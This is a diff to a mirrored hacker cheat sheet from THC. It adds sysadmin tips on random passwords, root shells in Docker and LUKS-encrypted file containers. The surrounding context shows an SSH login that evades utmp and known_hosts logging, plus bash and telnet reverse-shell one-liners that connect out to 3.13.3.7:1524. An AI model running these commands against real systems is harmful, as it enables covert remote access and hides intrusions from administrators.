mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-06-02 20:31:34 +02:00
rootTHC
@@ -26,7 +26,7 @@ $ kill -9 $$
|
||||
```
|
||||
$ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
|
||||
```
|
||||
This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. On your client side it will stop logging the host name to *~/.ssh/known_hosts*.
|
||||
This will not add your user to the */var/log/utmp* file and you wont show up in *w* or *who* command of logged in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to *~/.ssh/known_hosts*.
|
||||
|
||||
**3. SSH tunnel OUT**
|
||||
|
||||
@@ -253,7 +253,57 @@ Make a *bing*-noise (ascii BEL) when anyone tries to SSH to/from our system (cou
|
||||
# tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done
|
||||
```
|
||||
|
||||
**20. Bash reverse shell**
|
||||
**20. Generate quick random Password**
|
||||
|
||||
Good for quick passwords without human element.
|
||||
|
||||
```
|
||||
$ openssl rand -base64 24
|
||||
```
|
||||
|
||||
**21. Get a root shell in Docker container.**
|
||||
|
||||
If the container is already running:
|
||||
|
||||
```
|
||||
$ docker exec -it --user root <container-name> /bin/bash
|
||||
```
|
||||
|
||||
If the container is not running:
|
||||
|
||||
```
|
||||
$ docker run -it --user root --entrypoint /bin/bash <container>
|
||||
```
|
||||
|
||||
**22. Linux transportable encrypted filesystems.**
|
||||
|
||||
Like truecrypt but better. You may need to `losetup -f` to get a loop device.
|
||||
|
||||
Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password.
|
||||
|
||||
```
|
||||
$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock
|
||||
$ cryptsetup luksFormat /tmp/crypted
|
||||
$ mkfs.ext3 /tmp/crypted
|
||||
```
|
||||
|
||||
Mount:
|
||||
|
||||
```
|
||||
# losetup /dev/loop0 /tmp/crypted
|
||||
# cryptsetup open /dev/loop0 crypted
|
||||
# mount -t ext3 /dev/mapper/crypted /mnt/crypted
|
||||
```
|
||||
|
||||
Store data in `/mnt/crypted`, then unmount:
|
||||
|
||||
```
|
||||
# umount /mnt/crypted
|
||||
# cryptsetup close crypted
|
||||
# losetup -d /dev/loop0
|
||||
```
|
||||
|
||||
**23. Bash reverse shell**
|
||||
|
||||
Start netcat to listen on port 1524 on your system:
|
||||
```
|
||||
@@ -265,7 +315,7 @@ On the remote system. This Bash will connect back to your system (IP = 3.13.3.7,
|
||||
$ bash -i 2>&1 >& /dev/tcp/3.13.3.7/1524 0>&1
|
||||
```
|
||||
|
||||
**21. Reverse Shell without Bash**
|
||||
**24. Reverse Shell without Bash**
|
||||
|
||||
Especially embedded systems do not always have Bash and the */dev/tcp/* trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
|
||||
|
||||
@@ -281,6 +331,7 @@ $ mkfifo /tmp/.io
|
||||
$ sh -i 2>&1 </tmp/.io | telnet 3.13.3.7 1524 >/tmp/.io
|
||||
```
|
||||
|
||||
|
||||
--------------------------------------------------------------------------
|
||||
Shoutz: ADM
|
||||
|
||||
|
||||
Reference in New Issue
Block a user